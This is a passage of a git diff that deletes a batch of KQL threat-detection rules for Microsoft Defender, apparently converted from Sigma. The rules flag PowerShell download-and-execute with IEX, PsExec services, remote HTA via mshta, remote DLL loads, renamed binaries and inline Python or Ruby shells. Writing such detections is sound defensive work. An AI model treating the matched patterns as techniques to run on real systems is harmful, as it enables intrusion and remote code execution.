-| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression")
\ No newline at end of file
diff --git a/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql b/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql
deleted file mode 100644
index 5a6718b4..00000000
--- a/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/30 -// Level: high -// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/PowerShell_Script_Execution_Policy_Enabled.kql b/Execution/PowerShell_Script_Execution_Policy_Enabled.kql deleted file mode 100644 index 003aa763..00000000 --- a/Execution/PowerShell_Script_Execution_Policy_Enabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo -// Date: 2023/10/18 -// Level: low -// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. -// Tags: attack.execution -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts" \ No newline at end of file 
diff --git a/Execution/PowerShell_Script_Run_in_AppData.kql b/Execution/PowerShell_Script_Run_in_AppData.kql deleted file mode 100644 index afece119..00000000 --- a/Execution/PowerShell_Script_Run_in_AppData.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019/01/09 -// Level: medium -// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\")) \ No newline at end of file diff --git a/Execution/PowerShell_Web_Download.kql b/Execution/PowerShell_Web_Download.kql deleted file mode 100644 index b25ef740..00000000 --- a/Execution/PowerShell_Web_Download.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/24 -// Level: medium -// Description: Detects suspicious ways to download files or content using PowerShell -// Tags: attack.command_and_control, attack.execution, attack.t1059.001, attack.t1105 -DeviceProcessEvents -| where ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " \ No newline at end of file diff --git a/Execution/PowerShell_as_a_Service_in_Registry.kql b/Execution/PowerShell_as_a_Service_in_Registry.kql deleted file mode 100644 index db6f8eca..00000000 --- a/Execution/PowerShell_as_a_Service_in_Registry.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: oscd.community, Natalia Shornikova -// Date: 2020/10/06 -// Level: high -// Description: Detects that a powershell code is written to the registry as a service. -// Tags: attack.execution, attack.t1569.002 -DeviceRegistryEvents -| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey contains "\\Services" and RegistryKey endswith "\\ImagePath" \ No newline at end of file diff --git a/Execution/Powershell_Inline_Execution_From_A_File.kql b/Execution/Powershell_Inline_Execution_From_A_File.kql deleted file mode 100644 index b0993719..00000000 --- a/Execution/Powershell_Inline_Execution_From_A_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/25 -// Level: medium -// Description: Detects inline execution of PowerShell code from a file -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ") \ No newline at end of file diff --git a/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql b/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql deleted file mode 100644 index 7dffb2f5..00000000 --- a/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Markus Neis, @markus_neis, Florian Roth -// Date: 2021/07/04 -// Level: critical -// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 -// Tags: attack.execution, attack.t1204, cve.2021.1675, cve.2021.34527 -DeviceRegistryEvents -| where (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer")) \ No newline at end of file diff --git a/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql b/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql deleted file mode 100644 index 864ecfca..00000000 --- a/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql +++ /dev/null 
@@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2022/06/09 -// Level: medium -// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not(((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains " --processStart" and ProcessCommandLine contains "Discord.exe") or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe"))))) \ No newline at end of file diff --git a/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index 2d36359f..00000000 
--- a/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: medium -// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create"))) \ No newline at end of file diff --git a/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql b/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql deleted file mode 100644 index ef5df7d2..00000000 --- a/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team -// Date: 2020/10/12 -// Level: high -// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll "))) \ No newline at end of file 
diff --git a/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql b/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql deleted file mode 100644 index c1db5f78..00000000 --- a/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) -// Tags: attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/Execution/PsExec_Service_Execution.kql b/Execution/PsExec_Service_Execution.kql deleted file mode 100644 index 124c9951..00000000 --- a/Execution/PsExec_Service_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems) -// Date: 2017/06/12 -// Level: medium -// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution -// Tags: attack.execution -DeviceProcessEvents -| where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" \ No newline at end of file diff --git a/Execution/PsExec_Service_File_Creation.kql b/Execution/PsExec_Service_File_Creation.kql deleted file mode 100644 index 8280b56f..00000000 --- a/Execution/PsExec_Service_File_Creation.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2017/06/12 -// Level: low -// Description: Detects default PsExec service filename which indicates PsExec service installation and execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceFileEvents -| where FolderPath endswith "\\PSEXESVC.exe" \ No newline at end of file diff --git a/Execution/Psexec_Execution.kql b/Execution/Psexec_Execution.kql deleted file mode 100644 index 84b896e7..00000000 --- a/Execution/Psexec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: omkar72 -// Date: 2020/10/30 -// Level: medium -// Description: Detects user accept agreement execution in psexec commandline -// Tags: attack.execution, attack.t1569, attack.t1021 -DeviceProcessEvents -| where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c" \ No newline at end of file diff --git a/Execution/Python_Inline_Command_Execution.kql b/Execution/Python_Inline_Command_Execution.kql deleted file mode 100644 index 6cd4f03e..00000000 --- a/Execution/Python_Inline_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Python") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"))) \ No newline at end of file 
diff --git a/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql b/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql deleted file mode 100644 index 675fc6f5..00000000 --- a/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nextron Systems -// Date: 2022/06/03 -// Level: high -// Description: Detects python spawning a pretty tty -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn") \ No newline at end of file diff --git a/Execution/Query_Usage_To_Exfil_Data.kql b/Execution/Query_Usage_To_Exfil_Data.kql deleted file mode 100644 index d4a9d73a..00000000 --- a/Execution/Query_Usage_To_Exfil_Data.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: medium -// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe" \ No newline at end of file diff --git a/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql b/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql deleted file mode 100644 index 6ee0ff69..00000000 --- a/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/07 -// Level: medium -// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql b/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql deleted file mode 100644 index 6b4d33b2..00000000 --- a/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/15 -// Level: medium -// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE") \ No newline at end of file diff --git a/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql b/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql deleted file mode 100644 index e8f1f303..00000000 --- a/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/07/17 -// Level: medium -// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. -// Tags: attack.defense_evasion, attack.t1574, attack.execution -DeviceProcessEvents -| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl"))) \ No newline at end of file diff --git a/Execution/RemCom_Service_File_Creation.kql b/Execution/RemCom_Service_File_Creation.kql deleted file mode 100644 index 4564d7da..00000000 --- a/Execution/RemCom_Service_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/04 -// Level: medium -// Description: Detects default RemCom service filename which indicates RemCom service installation and execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceFileEvents -| where FolderPath endswith "\\RemComSvc.exe" \ No newline at end of file diff --git a/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql b/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql deleted file mode 100644 index 23d22f38..00000000 --- a/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql +++ /dev/null 
@@ -1,11 +0,0 @@ -// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/02/08 -// Level: medium -// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8. -Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. -Use this rule to detect instances of older versions of Anydesk using the compromised certificate -This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. - -// Tags: attack.execution, attack.initial_access -DeviceProcessEvents -| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall"))) \ No newline at end of file diff --git a/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql b/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql deleted file mode 100644 index 407483d4..00000000 --- a/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Ali Alwashali -// Date: 2023/10/10 -// Level: low -// Description: Detects the execution of a system command via the ScreenConnect RMM service. -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe" \ No newline at end of file diff --git a/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql b/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql deleted file mode 100644 index 868f9720..00000000 --- a/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Ali Alwashali -// Date: 2023/10/10 -// Level: low -// Description: Detects the creation of files in a specific location by ScreenConnect RMM. -ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. - -// Tags: attack.execution, attack.t1059.003 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\" \ No newline at end of file diff --git a/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql b/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql deleted file mode 100644 index 723a8b9d..00000000 --- a/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/18 -// Level: medium -// Description: Detects a remote DLL load event via "rundll32.exe". -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file 
diff --git a/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql b/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql deleted file mode 100644 index 952fe894..00000000 --- a/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019/09/12 -// Level: medium -// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). -// Tags: attack.execution, attack.t1059.001, attack.t1021.006 -DeviceProcessEvents -| where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql b/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql deleted file mode 100644 index d0784cd7..00000000 --- a/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/08 -// Level: high -// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file -// Tags: attack.defense_evasion, attack.execution, attack.t1218.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file diff --git a/Execution/Renamed_CURL.EXE_Execution.kql b/Execution/Renamed_CURL.EXE_Execution.kql deleted file mode 100644 index 5fedd523..00000000 --- a/Execution/Renamed_CURL.EXE_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/09/11 -// Level: medium -// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl")) \ No newline at end of file diff --git a/Execution/Renamed_FTP.EXE_Execution.kql b/Execution/Renamed_FTP.EXE_Execution.kql deleted file mode 100644 index a2a27522..00000000 --- a/Execution/Renamed_FTP.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe")) \ No newline at end of file diff --git a/Execution/Renamed_Jusched.EXE_Execution.kql b/Execution/Renamed_Jusched.EXE_Execution.kql deleted file mode 100644 index 059e77e2..00000000 --- a/Execution/Renamed_Jusched.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Swisscom -// Date: 2019/06/04 -// Level: high -// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group -// Tags: attack.execution, attack.defense_evasion, attack.t1036.003 -DeviceProcessEvents -| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe")) \ No newline at end of file diff --git a/Execution/Renamed_NirCmd.EXE_Execution.kql b/Execution/Renamed_NirCmd.EXE_Execution.kql deleted file mode 100644 index fe83139c..00000000 
--- a/Execution/Renamed_NirCmd.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2024/03/11 -// Level: high -// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe"))) \ No newline at end of file diff --git a/Execution/Renamed_PingCastle_Binary_Execution.kql b/Execution/Renamed_PingCastle_Binary_Execution.kql deleted file mode 100644 index 98720000..00000000 --- a/Execution/Renamed_PingCastle_Binary_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2024/01/11 -// Level: high -// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe"))) \ No newline at end of file diff --git a/Execution/Renamed_PsExec_Service_Execution.kql b/Execution/Renamed_PsExec_Service_Execution.kql deleted file mode 100644 index 030057ea..00000000 --- a/Execution/Renamed_PsExec_Service_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators -// Tags: attack.execution -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe")) \ No newline at end of file diff --git a/Execution/Ruby_Inline_Command_Execution.kql b/Execution/Ruby_Inline_Command_Execution.kql deleted file mode 100644 index 29b2f989..00000000 --- a/Execution/Ruby_Inline_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe") \ No newline at end of file diff --git a/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql b/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql deleted file mode 100644 index bd9b3783..00000000 --- a/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community -// Date: 2020/10/17 -// Level: high -// Description: Detects PowerShell script execution via input stream redirect -// Tags: attack.defense_evasion, attack.execution, attack.t1059 